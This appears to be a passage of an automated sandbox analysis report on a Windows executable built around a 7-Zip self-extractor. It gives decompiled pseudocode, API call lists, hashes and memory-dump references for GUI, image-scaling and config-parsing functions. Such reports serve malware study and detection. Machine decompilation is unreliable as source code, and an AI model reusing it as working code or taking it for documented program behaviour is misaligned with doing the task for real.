                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$File$memcpy$??2@AttributesPathTemp$ByteCharCloseCreateDriveExecuteHandleMultiShellTypeWideWritewsprintf
                                          • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$PreExtract$del "$if exist "$open
                                          • API String ID: 1368565367-2062918900
                                          • Opcode ID: 232e350dee0cb52598af980228999ff10728722e1d185b52cc315b7c7eca06e3
                                          • Instruction ID: 3d7160049abe49b234d8e21697658e41e6c45daee110ef6cf63ccbde248cf787
                                          • Opcode Fuzzy Hash: 232e350dee0cb52598af980228999ff10728722e1d185b52cc315b7c7eca06e3
                                          • Instruction Fuzzy Hash: B8416075940108BADB05EBA1DC86DEF7B78EF85704F10406AF602B60E1DB786E85CB5C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404BA4, Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 115windowlibrarystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 90%
                                          			E00404BA4(struct HWND__* __ecx) {
				struct HWND__* _v8;
				intOrPtr _v12;
				void* _v16;
				char _v28;
				long _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				int _v52;
				int _v56;
				char _v120;
				signed char _t30;
				struct HWND__* _t33;
				struct HMENU__* _t36;
				struct HWND__* _t53;
				struct HWND__* _t67;

				_t67 = __ecx;
				if(GetClassNameA(__ecx,  &_v120, 0x40) == 0 || lstrcmpiA( &_v120, "STATIC") != 0) {
					L5:
					return 0;
				} else {
					_t30 = GetWindowLongW(_t67, 0xfffffff0);
					_t71 = _t30 & 0x0000000e;
					if((_t30 & 0x0000000e) != 0) {
						goto L5;
					}
					E00404AF5( &_v28, _t67, _t71);
					if(E00403786(_v28, L"{\\rtf", 5) == 0) {
						_t33 = GetParent(_t67);
						_v8 = _t33;
						__eflags = _t33;
						if(_t33 == 0) {
							goto L4;
						}
						LoadLibraryA("riched20");
						E004038D4(_t67,  &_v56);
						_t36 = GetMenu(_t67);
						SetThreadLocale(0x419);
						_t53 = CreateWindowExW(0, L"RichEdit20W", 0x41da3c, 0x50000804, _v56, _v52, _v48 - _v56, _v44 - _v52, _v8, _t36, 0, 0);
						__eflags = _t53;
						if(__eflags == 0) {
							goto L4;
						}
						DestroyWindow(_t67);
						SendMessageW(_t53, 0x459, 0x22, 0);
						SendMessageW(_t53, 0x443, 0, GetSysColor(0xf));
						_v12 = 0xfde9;
						_v16 = 0;
						E0040438B( &_v40,  &_v28, __eflags, 0xfde9);
						SendMessageW(_t53, 0x461,  &_v16, _v40);
						_push(_v40);
						L0041C160();
						_push(_v28);
						L0041C160();
						return _t53;
					}
					L4:
					_push(_v28);
					L0041C160();
					goto L5;
				}
			}


















                                          0x00404bb2
                                          0x00404bbe
                                          0x00404c06
                                          0x00000000
                                          0x00404bd3
                                          0x00404bd6
                                          0x00404bdc
                                          0x00404bde
                                          0x00000000
                                          0x00000000
                                          0x00404be5
                                          0x00404bfb
                                          0x00404c0e
                                          0x00404c16
                                          0x00404c19
                                          0x00404c1b
                                          0x00000000
                                          0x00000000
                                          0x00404c22
                                          0x00404c2d
                                          0x00404c33
                                          0x00404c40
                                          0x00404c76
                                          0x00404c78
                                          0x00404c7a
                                          0x00000000
                                          0x00000000
                                          0x00404c7d
                                          0x00404c92
                                          0x00404ca4
                                          0x00404cb2
                                          0x00404cb5
                                          0x00404cb8
                                          0x00404cca
                                          0x00404ccc
                                          0x00404ccf
                                          0x00404cd4
                                          0x00404cd7
                                          0x00000000
                                          0x00404cde
                                          0x00404bfd
                                          0x00404bfd
                                          0x00404c00
                                          0x00000000
                                          0x00404c05

                                          APIs
                                          • GetClassNameA.USER32(?,?,00000040), ref: 00404BB6
                                          • lstrcmpiA.KERNEL32(?,STATIC,?,?,00000040), ref: 00404BC9
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404BD6
                                            • Part of subcall function 00404AF5: GetWindowTextLengthW.USER32(?), ref: 00404B02
                                            • Part of subcall function 00404AF5: GetWindowTextW.USER32 ref: 00404B1C
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404C00
                                          • GetParent.USER32 ref: 00404C0E
                                          • LoadLibraryA.KERNEL32(riched20,?,00000005,?,000000F0,?,?,00000040), ref: 00404C22
                                          • GetMenu.USER32 ref: 00404C33
                                          • SetThreadLocale.KERNEL32(00000419,?,?,00000005,?,000000F0,?,?,00000040), ref: 00404C40
                                          • CreateWindowExW.USER32 ref: 00404C70
                                          • DestroyWindow.USER32(?,?,?,00000005,?,000000F0,?,?,00000040), ref: 00404C7D
                                          • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00404C92
                                          • GetSysColor.USER32(0000000F), ref: 00404C96
                                          • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00404CA4
                                          • SendMessageW.USER32(00000000,00000461,?,?), ref: 00404CCA
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404CCF
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404CD7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Window$??3@MessageSend$Text$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                          • String ID: RichEdit20W$STATIC$riched20${\rtf
                                          • API String ID: 3514532227-2281146334
                                          • Opcode ID: 8a4bf377b52e9b664479eb2b7b1a16ad8fb9dd63c4c5e663889616ad64bdffec
                                          • Instruction ID: 653fa6765fec41a2c767cdcafb0f0c5f7003fb3de14a91a34d01aabbe2365a95
                                          • Opcode Fuzzy Hash: 8a4bf377b52e9b664479eb2b7b1a16ad8fb9dd63c4c5e663889616ad64bdffec
                                          • Instruction Fuzzy Hash: BF3183F1E40119BBDB10ABA5DD49EEFBB7DEF44704F10807AF601B2191DA789A418B6C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004039F1, Relevance: 31.6, APIs: 21, Instructions: 119windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 89%
                                          			E004039F1(void* __ecx) {
				struct HDC__* _v8;
				struct HDC__* _v12;
				void* _v16;
				int _v20;
				void* _v24;
				void* _v28;
				int _v44;
				int _v48;
				void _v52;
				struct HDC__* _t37;
				int _t38;
				int _t39;
				int _t62;
				struct HDC__* _t63;

				_v16 = __ecx;
				_t37 = GetWindowDC(0);
				_v8 = _t37;
				_t38 = GetDeviceCaps(_t37, 0x58);
				if(_t38 < 1) {
					_t38 = 0x60;
				}
				_t39 = MulDiv(_t38, 0x64, 0x60);
				if(_t39 < 0x76) {
					if(_t39 <= 0x91) {
						ReleaseDC(0, _v8);
						return CopyImage(_v16, 0, 0, 0, 0);
					}
					goto L6;
				} else {
					if(_t39 > 0x91) {
						L6:
						_push(3);
						_v12 = 2;
						L7:
						_pop(_t62);
						GetObjectW(_v16, 0x18,  &_v52);
						_v24 = MulDiv(_v48, _t62, _v12);
						_v20 = MulDiv(_v44, _t62, _v12);
						_v12 = CreateCompatibleDC(_v8);
						_t63 = CreateCompatibleDC(_v8);
						_v16 = SelectObject(_v12, _v16);
						_v28 = SelectObject(_t63, CreateCompatibleBitmap(_v8, _v24, _v20));
						SetStretchBltMode(_t63, 4);
						StretchBlt(_t63, 0, 0, _v24, _v20, _v12, 0, 0, _v48, _v44, 0xcc0020);
						_v24 = GetCurrentObject(_t63, 7);
						SelectObject(_v12, _v16);
						SelectObject(_t63, _v28);
						DeleteDC(_v12);
						DeleteDC(_t63);
						ReleaseDC(0, _v8);
						return _v24;
					}
					_push(4);
					_v12 = 3;
					goto L7;
				}
			}

















                                          0x004039fd
                                          0x00403a00
                                          0x00403a09
                                          0x00403a0c
                                          0x00403a15
                                          0x00403a19
                                          0x00403a19
                                          0x00403a25
                                          0x00403a2a
                                          0x00403a43
                                          0x00403b19
                                          0x00000000
                                          0x00403b26
                                          0x00000000
                                          0x00403a2c
                                          0x00403a31
                                          0x00403a49
                                          0x00403a49
                                          0x00403a4b
                                          0x00403a52
                                          0x00403a52
                                          0x00403a5c
                                          0x00403a6e
                                          0x00403a80
                                          0x00403a88
                                          0x00403a99
                                          0x00403aa0
                                          0x00403ab6
                                          0x00403ab9
                                          0x00403ad8
                                          0x00403aea
                                          0x00403af0
                                          0x00403af6
                                          0x00403b01
                                          0x00403b04
                                          0x00403b0a
                                          0x00000000
                                          0x00403b10
                                          0x00403a33
                                          0x00403a35
                                          0x00000000
                                          0x00403a35

                                          APIs
                                          • GetWindowDC.USER32(00000000), ref: 00403A00
                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00403A0C
                                          • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00403A25
                                          • GetObjectW.GDI32(?,00000018,?), ref: 00403A5C
                                          • MulDiv.KERNEL32(?,00000003,00000002), ref: 00403A69
                                          • MulDiv.KERNEL32(?,00000003,00000002), ref: 00403A75
                                          • CreateCompatibleDC.GDI32(?), ref: 00403A83
                                          • CreateCompatibleDC.GDI32(?), ref: 00403A8B
                                          • SelectObject.GDI32(00000002,?), ref: 00403A9B
                                          • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00403AA9
                                          • SelectObject.GDI32(00000000,00000000), ref: 00403AB1
                                          • SetStretchBltMode.GDI32(00000000,00000004), ref: 00403AB9
                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000002,00000000,00000000,?,?,00CC0020), ref: 00403AD8
                                          • GetCurrentObject.GDI32(00000000,00000007), ref: 00403AE1
                                          • SelectObject.GDI32(00000002,?), ref: 00403AF0
                                          • SelectObject.GDI32(00000000,?), ref: 00403AF6
                                          • DeleteDC.GDI32(00000002), ref: 00403B01
                                          • DeleteDC.GDI32(00000000), ref: 00403B04
                                          • ReleaseDC.USER32 ref: 00403B0A
                                          • ReleaseDC.USER32 ref: 00403B19
                                          • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00403B26
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                          • String ID:
                                          • API String ID: 3462224810-0
                                          • Opcode ID: 612ab1c299c70adb56458b05f96c4172f6b033e0d16868d111d26e83d45414ef
                                          • Instruction ID: 64add8f3f0553c82617c9ad687e152a2c61f87497f12b8b4a2d195a12937468c
                                          • Opcode Fuzzy Hash: 612ab1c299c70adb56458b05f96c4172f6b033e0d16868d111d26e83d45414ef
                                          • Instruction Fuzzy Hash: 3941E0B6D00218BFDF119FE1DC48EAEBF79EB08765F108066F601B21A0C7758A51AF64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040502A, Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 256COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E0040502A(intOrPtr* __ecx, intOrPtr __edx, void* __eflags) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _v36;
				char _v40;
				char _v52;
				char _v64;
				char _v76;
				char _v88;
				wchar_t* _v100;
				void* __edi;
				void* _t76;
				void* _t86;
				WCHAR* _t88;
				intOrPtr _t89;
				WCHAR* _t90;
				intOrPtr _t92;
				WCHAR* _t96;
				WCHAR* _t99;
				intOrPtr _t100;
				WCHAR* _t104;
				WCHAR* _t105;
				WCHAR* _t110;
				WCHAR* _t111;
				char _t113;
				intOrPtr _t115;
				signed int _t117;
				WCHAR* _t122;
				char _t133;
				signed int _t140;
				char _t142;
				WCHAR* _t154;
				signed int _t162;
				intOrPtr* _t165;
				void* _t167;
				signed int _t168;
				WCHAR* _t169;
				WCHAR** _t170;
				WCHAR* _t171;
				void* _t173;

				_v8 = _v8 & 0x00000000;
				_t165 = __ecx;
				_v12 = __edx;
				E004143C2(_t76,  &_v40);
				L49:
				while(E00403251( &_v8, _t165) != 0) {
					while(1) {
						_v20 = _t133;
						__eflags = E0040322D(_t133);
						if(__eflags != 0) {
							break;
						}
						__eflags = _t133 - 0x3d;
						if(__eflags == 0) {
							break;
						}
						E00402F9F( &_v52, _v20);
						_t122 =  &(_t122[0]);
						__eflags = _t122;
						_t133 =  *((intOrPtr*)(_t167 + _t122));
					}
					E004148C7( &_v100, E00404346( &_v64,  &_v52, __eflags, 0xfde9));
					_push(_v64);
					L0041C160();
					_push(_v52);
					L0041C160();
					__eflags = _t122;
					if(_t122 == 0) {
						_t162 = _v8;
						L53:
						_t86 = E004044E1(_t165, _t162, _v12);
						_push(_v88);
						L0041C160();
						_push(_v100);
						L0041C160();
						_push(_v40);
						L0041C160();
						return _t86;
					}
					_v8 = _t122 + _v8;
					_t163 = _t165;
					_t88 = E00403251( &_v8, _t165);
					__eflags = _t88;
					if(_t88 == 0) {
						L52:
						_t162 = _v16;
						goto L53;
					}
					_t89 =  *_t165;
					_t140 = _v8;
					__eflags =  *((char*)(_t140 + _t89)) - 0x3d;
					if( *((char*)(_t140 + _t89)) != 0x3d) {
						goto L52;
					}
					_v8 = _v8 + 1;
					_t90 = E00403251( &_v8, _t163);
					__eflags = _t90;
					if(_t90 == 0) {
						goto L52;
					}
					_t168 = _v8;
					_t92 =  *((intOrPtr*)(_t168 +  *_t165));
					__eflags = _t92 - 0x22;
					if(_t92 == 0x22) {
						_t169 = _t168 + 1;
						_v36 = _v36 & 0x00000000;
						_v8 = _t169;
						 *_v40 = 0;
						while(1) {
							L29:
							_t96 = strncmp( *_t165 + _t169, "{\\rtf", 5);
							_t173 = _t173 + 0xc;
							__eflags = _t96;
							if(_t96 != 0) {
								goto L28;
							} else {
								break;
							}
							while(1) {
								L28:
								_t99 = strncmp( *_t165 + _t169, "{\\rtf", 5);
								_t173 = _t173 + 0xc;
								__eflags = _t99;
								if(_t99 == 0) {
									goto L29;
								}
								__eflags = _t169 -  *((intOrPtr*)(_t165 + 4));
								if(_t169 >=  *((intOrPtr*)(_t165 + 4))) {
									goto L52;
								}
								_t100 =  *_t165;
								_t142 =  *((intOrPtr*)(_t100 + _t169));
								_t169 =  &(_t169[0]);
								_v28 = _t142;
								_v8 = _t169;
								__eflags = _t142 - 0x22;
								if(__eflags == 0) {
									L39:
									_t164 =  &_v40;
									E004148C7( &_v88, E00404346( &_v76,  &_v40, __eflags, 0xfde9));
									_push(_v76);
									L0041C160();
									E0040457E( &_v88, _t165, __eflags);
									_t104 = lstrcmpW(_v100, L"SetEnvironment");
									__eflags = _t104;
									if(_t104 != 0) {
										L41:
										__eflags =  *0x422120;
										_t170 = 0x422120;
										if( *0x422120 == 0) {
											L45:
											_t164 = 0;
											_t105 = E00404F11(_v100, 0);
											__eflags = _t105;
											if(_t105 == 0) {
												L47:
												E0040287B( &_v100, 0x4227a0, _t164,  &_v100);
												L48:
												_push(_v88);
												L0041C160();
												_push(_v100);
												L0041C160();
												goto L49;
											}
											_t64 =  &(_t105[6]); // 0xc
											E00414864(_t64, _v88);
											goto L48;
										} else {
											goto L42;
										}
										while(1) {
											L42:
											_t110 = wcsncmp(_v100,  *_t170, lstrlenW( *_t170));
											_t173 = _t173 + 0xc;
											__eflags = _t110;
											if(_t110 == 0) {
												break;
											}
											_t170 =  &(_t170[1]);
											__eflags =  *_t170;
											if( *_t170 != 0) {
												continue;
											}
											break;
										}
										__eflags =  *_t170;
										if( *_t170 != 0) {
											goto L47;
										}
										goto L45;
									}
									_t164 = 0x3d;
									_t111 = E0041420C(_v88,  &_v40);
									__eflags = _t111;
									if(_t111 <= 0) {
										goto L52;
									}
									goto L41;
								}
								__eflags = _t142 - 0x5c;
								if(_t142 != 0x5c) {
									_push(_v28);
									L26:
									_t153 =  &_v40;
									L27:
									E00402F9F(_t153);
									continue;
								}
								_t113 =  *((intOrPtr*)(_t100 + _t169));
								_t169 =  &(_t169[0]);
								_v24 = _t113;
								_v8 = _t169;
								__eflags = _t113 - 0x22;
								if(_t113 == 0x22) {
									_push(0x22);
									goto L26;
								}
								__eflags = _t113 - _t142;
								if(_t113 == _t142) {
									_push(0x5c);
									goto L26;
								}
								__eflags = _t113 - 0x6e;
								if(_t113 == 0x6e) {
									_push(0xa);
									goto L26;
								}
								_t153 =  &_v40;
								__eflags = _t113 - 0x74;
								if(_t113 == 0x74) {
									_push(9);
									goto L27;
								}
								E00402F9F( &_v40, 0x5c);
								_push(_v24);
								goto L26;
							}
						}
						while(1) {
							_t115 =  *_t165;
							_t154 =  *(_t115 + _t169);
							__eflags = _t154;
							if(_t154 == 0) {
								break;
							}
							__eflags = _t154 - 0x22;
							if(_t154 == 0x22) {
								break;
							}
							__eflags = _t154 - 0x5c;
							if(_t154 == 0x5c) {
								__eflags =  *((char*)(_t115 +  &(_t169[0]))) - 0x22;
								if( *((char*)(_t115 +  &(_t169[0]))) == 0x22) {
									_t169 =  &(_t169[0]);
									__eflags = _t169;
								}
							}
							_t117 =  *(_t115 + _t169) & 0x000000ff;
							_t169 =  &(_t169[0]);
							__eflags = _t169;
							_v8 = _t169;
							E00402F9F( &_v40, _t117);
						}
						__eflags =  *((char*)(_t169 +  *_t165));
						if(__eflags != 0) {
							_t171 =  &(_t169[0]);
							__eflags = _t171;
							_v8 = _t171;
						}
						goto L39;
					}
					__eflags = _t92 - 0x2d;
					if(_t92 != 0x2d) {
						goto L52;
					}
					E00404FEE(_v100);
					_v8 = _t168 + 1;
					goto L48;
				}
				_push(_v40);
				L0041C160();
				return 1;
			}














































                                          0x00405030
                                          0x00405037
                                          0x0040503c
                                          0x0040503f
                                          0x00000000
                                          0x004052c4
                                          0x00405085
                                          0x00405087
                                          0x0040508f
                                          0x00405091
                                          0x00000000
                                          0x00000000
                                          0x00405071
                                          0x00405074
                                          0x00000000
                                          0x00000000
                                          0x0040507c
                                          0x00405081
                                          0x00405081
                                          0x00405082
                                          0x00405082
                                          0x004050a7
                                          0x004050ac
                                          0x004050af
                                          0x004050b4
                                          0x004050b7
                                          0x004050be
                                          0x004050c0
                                          0x004052e3
                                          0x004052eb
                                          0x004052f0
                                          0x004052f5
                                          0x004052fa
                                          0x004052ff
                                          0x00405302
                                          0x00405307
                                          0x0040530a
                                          0x00000000
                                          0x00405311
                                          0x004050c6
                                          0x004050cc
                                          0x004050ce
                                          0x004050d3
                                          0x004050d5
                                          0x004052e8
                                          0x004052e8
                                          0x00000000
                                          0x004052e8
                                          0x004050db
                                          0x004050dd
                                          0x004050e0
                                          0x004050e4
                                          0x00000000
                                          0x00000000
                                          0x004050ea
                                          0x004050f0
                                          0x004050f5
                                          0x004050f7
                                          0x00000000
                                          0x00000000
                                          0x004050ff
                                          0x00405102
                                          0x00405105
                                          0x00405107
                                          0x0040512b
                                          0x0040512c
                                          0x00405130
                                          0x00405133
                                          0x004051b4
                                          0x004051b4
                                          0x004051c0
                                          0x004051c2
                                          0x004051c5
                                          0x004051c7
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040519f
                                          0x0040519f
                                          0x004051ab
                                          0x004051ad
                                          0x004051b0
                                          0x004051b2
                                          0x00000000
                                          0x00000000
                                          0x00405138
                                          0x0040513b
                                          0x00000000
                                          0x00000000
                                          0x00405141
                                          0x00405143
                                          0x00405146
                                          0x00405147
                                          0x0040514a
                                          0x0040514d
                                          0x00405150
                                          0x00405203
                                          0x00405208
                                          0x00405217
                                          0x0040521c
                                          0x0040521f
                                          0x00405228
                                          0x00405235
                                          0x0040523b
                                          0x0040523d
                                          0x00405252
                                          0x00405252
                                          0x00405259
                                          0x0040525e
                                          0x00405289
                                          0x0040528c
                                          0x0040528e
                                          0x00405293
                                          0x00405295
                                          0x004052a4
                                          0x004052ad
                                          0x004052b2
                                          0x004052b2
                                          0x004052b5
                                          0x004052ba
                                          0x004052bd
                                          0x00000000
                                          0x004052c3
                                          0x0040529a
                                          0x0040529d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405260
                                          0x00405260
                                          0x0040526f
                                          0x00405275
                                          0x00405278
                                          0x0040527a
                                          0x00000000
                                          0x00000000
                                          0x0040527c
                                          0x0040527f
                                          0x00405282
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405282
                                          0x00405284
                                          0x00405287
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405287
                                          0x00405244
                                          0x00405245
                                          0x0040524a
                                          0x0040524c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040524c
                                          0x00405156
                                          0x00405159
                                          0x00405194
                                          0x00405197
                                          0x00405197
                                          0x0040519a
                                          0x0040519a
                                          0x00000000
                                          0x0040519a
                                          0x0040515b
                                          0x0040515e
                                          0x0040515f
                                          0x00405162
                                          0x00405165
                                          0x00405167
                                          0x00405190
                                          0x00000000
                                          0x00405190
                                          0x00405169
                                          0x0040516b
                                          0x0040518c
                                          0x00000000
                                          0x0040518c
                                          0x0040516d
                                          0x0040516f
                                          0x00405188
                                          0x00000000
                                          0x00405188
                                          0x00405171
                                          0x00405174
                                          0x00405176
                                          0x00405184
                                          0x00000000
                                          0x00405184
                                          0x0040517a
                                          0x0040517f
                                          0x00000000
                                          0x0040517f
                                          0x0040519f
                                          0x004051ee
                                          0x004051ee
                                          0x004051f0
                                          0x004051f3
                                          0x004051f5
                                          0x00000000
                                          0x00000000
                                          0x004051cb
                                          0x004051ce
                                          0x00000000
                                          0x00000000
                                          0x004051d0
                                          0x004051d3
                                          0x004051d5
                                          0x004051da
                                          0x004051dc
                                          0x004051dc
                                          0x004051dc
                                          0x004051da
                                          0x004051dd
                                          0x004051e1
                                          0x004051e1
                                          0x004051e6
                                          0x004051e9
                                          0x004051e9
                                          0x004051f9
                                          0x004051fd
                                          0x004051ff
                                          0x004051ff
                                          0x00405200
                                          0x00405200
                                          0x00000000
                                          0x004051fd
                                          0x00405109
                                          0x0040510b
                                          0x00000000
                                          0x00000000
                                          0x00405114
                                          0x0040511a
                                          0x00000000
                                          0x0040511a
                                          0x004052d6
                                          0x004052d9
                                          0x00000000

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$??2@
                                          • String ID: !B$SetEnvironment${\rtf
                                          • API String ID: 4113381792-3096309559
                                          • Opcode ID: 386ff0d9aa907bb68592818cdcbfebbaa15c4e14b06951a4543c434aa5179d25
                                          • Instruction ID: b708b963da35919fffc77302d43656a91cdc81ec60feee5546b613eda411056e
                                          • Opcode Fuzzy Hash: 386ff0d9aa907bb68592818cdcbfebbaa15c4e14b06951a4543c434aa5179d25
                                          • Instruction Fuzzy Hash: 69917C34900619ABCF15EB91C991BEFB7B1EF55308F2000ABE4427B2D2DA785E45DF49
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00409332, Relevance: 28.6, APIs: 19, Instructions: 149windowcomtimeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 95%
                                          			E00409332(void* __edx, void* __eflags) {
				int _v4;
				char _v8;
				void* __ecx;
				intOrPtr _t30;
				intOrPtr* _t33;
				signed int _t44;
				struct HMENU__* _t49;
				signed int _t53;
				intOrPtr _t62;
				void* _t71;
				intOrPtr _t74;
				signed int _t83;

				_t71 = __edx;
				_t74 = _t62;
				 *0x4228c4 =  *(_t74 + 4);
				 *0x4228c8 = _t74;
				E004079B7(_t62, 0x4b8, 1);
				SendMessageW(GetDlgItem( *(_t74 + 4), 0x4b8), 0x401, 0, 0x75300000);
				_t30 =  *0x422750; // 0x0
				if(_t30 != 0) {
					E00407DB7(_t74, _t71, 0x4b4, _t30);
					E0040790B(GetDlgItem( *(_t74 + 4), 0x4b4),  *0x422750);
				}
				if(( *0x42245c & 0x00000004) != 0) {
					E004079B7(_t74, 0x4b5, 1);
					_t53 = GetWindowLongW(GetDlgItem( *(_t74 + 4), 0x4b5), 0xfffffff0);
					SetWindowLongW(GetDlgItem( *(_t74 + 4), 0x4b5), 0xfffffff0, _t53 | 0x00000001);
					E00408183(_t74);
				}
				if( *0x422770 == 1) {
					E004079B7(_t74, 0x4b4, 0);
					_t49 = GetSystemMenu( *(_t74 + 4), 0);
					if(_t49 != 0) {
						EnableMenuItem(_t49, 0xf060, 1);
					}
				}
				SetFocus(GetDlgItem( *(_t74 + 4), 0x4b4));
				_t83 =  *0x4228d4; // 0x0
				if(_t83 != 0) {
					 *((intOrPtr*)(_t74 + 0x68)) = 0;
					 *((intOrPtr*)(_t74 + 0x6c)) = 0;
					 *((intOrPtr*)(_t74 + 0x60)) = 0x64;
					 *((intOrPtr*)(_t74 + 0x64)) = 0;
					_t44 =  *0x4228d4; // 0x0
					SetTimer( *(_t74 + 4), 1, _t44 * 0xa, 0);
				}
				_t33 = _t74 + 0x70;
				 *_t33 = 0;
				if(( *0x42245c & 0x00002000) == 0) {
					__imp__CoCreateInstance(0x41fa54, 0, 1, 0x41efe4, _t33);
					if(_t33 == 0) {
						E0040816A(_t74, 1);
					}
				}
				if( *0x422770 == 1 && IsWindow(GetDlgItem( *(_t74 + 4), 2)) != 0) {
					EnableWindow(GetDlgItem( *(_t74 + 4), 2), 0);
				}
				_t89 =  *0x42245c & 0x00000004;
				if(( *0x42245c & 0x00000004) == 0) {
					ShowWindow(GetDlgItem( *(_t74 + 4), 0x4b5), 0);
				}
				_v8 = 0;
				_v4 = 0;
				E0040885E(_t74, _t71, _t89,  &_v8);
				return E00408E57(_t71);
			}















                                          0x00409332
                                          0x00409338
                                          0x00409345
                                          0x0040934a
                                          0x00409350
                                          0x0040936e
                                          0x00409374
                                          0x00409380
                                          0x00409386
                                          0x0040939a
                                          0x0040939a
                                          0x004093ab
                                          0x004093b2
                                          0x004093c0
                                          0x004093d3
                                          0x004093db
                                          0x004093db
                                          0x004093e7
                                          0x004093ee
                                          0x004093f9
                                          0x00409401
                                          0x0040940b
                                          0x0040940b
                                          0x00409401
                                          0x00409418
                                          0x00409420
                                          0x00409426
                                          0x00409428
                                          0x0040942b
                                          0x0040942e
                                          0x00409435
                                          0x00409438
                                          0x00409447
                                          0x00409447
                                          0x0040944d
                                          0x00409450
                                          0x0040945c
                                          0x0040946c
                                          0x00409474
                                          0x0040947a
                                          0x0040947a
                                          0x00409474
                                          0x00409486
                                          0x004094a3
                                          0x004094a3
                                          0x004094a9
                                          0x004094b0
                                          0x004094ba
                                          0x004094ba
                                          0x004094c7
                                          0x004094cb
                                          0x004094cf
                                          0x004094e1

                                          APIs
                                            • Part of subcall function 004079B7: GetDlgItem.USER32 ref: 004079C4
                                            • Part of subcall function 004079B7: ShowWindow.USER32(00000000,?), ref: 004079DB
                                          • GetDlgItem.USER32 ref: 0040935F
                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040936E
                                          • GetDlgItem.USER32 ref: 00409395
                                            • Part of subcall function 0040790B: SetWindowTextW.USER32(00000000,00000000), ref: 00407913
                                            • Part of subcall function 0040885E: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00408896
                                            • Part of subcall function 0040885E: GetDlgItem.USER32 ref: 004088BA
                                            • Part of subcall function 0040885E: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 004088C7
                                            • Part of subcall function 0040885E: wsprintfW.USER32 ref: 004088E7
                                            • Part of subcall function 0040885E: GetDlgItem.USER32 ref: 00408905
                                            • Part of subcall function 0040885E: ??3@YAXPAX@Z.MSVCRT ref: 00408993
                                            • Part of subcall function 00408E57: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00409247), ref: 00408E81
                                            • Part of subcall function 00408E57: LoadIconW.USER32(00000000), ref: 00408E84
                                            • Part of subcall function 00408E57: GetSystemMetrics.USER32 ref: 00408E98
                                            • Part of subcall function 00408E57: GetSystemMetrics.USER32 ref: 00408E9D
                                            • Part of subcall function 00408E57: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00409247), ref: 00408EA6
                                            • Part of subcall function 00408E57: LoadImageW.USER32 ref: 00408EA9
                                            • Part of subcall function 00408E57: SendMessageW.USER32(?,00000080,00000001,?), ref: 00408EC9
                                            • Part of subcall function 00408E57: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408ED2
                                            • Part of subcall function 00408E57: GetDlgItem.USER32 ref: 00408EEF
                                            • Part of subcall function 00408E57: GetDlgItem.USER32 ref: 00408EF9
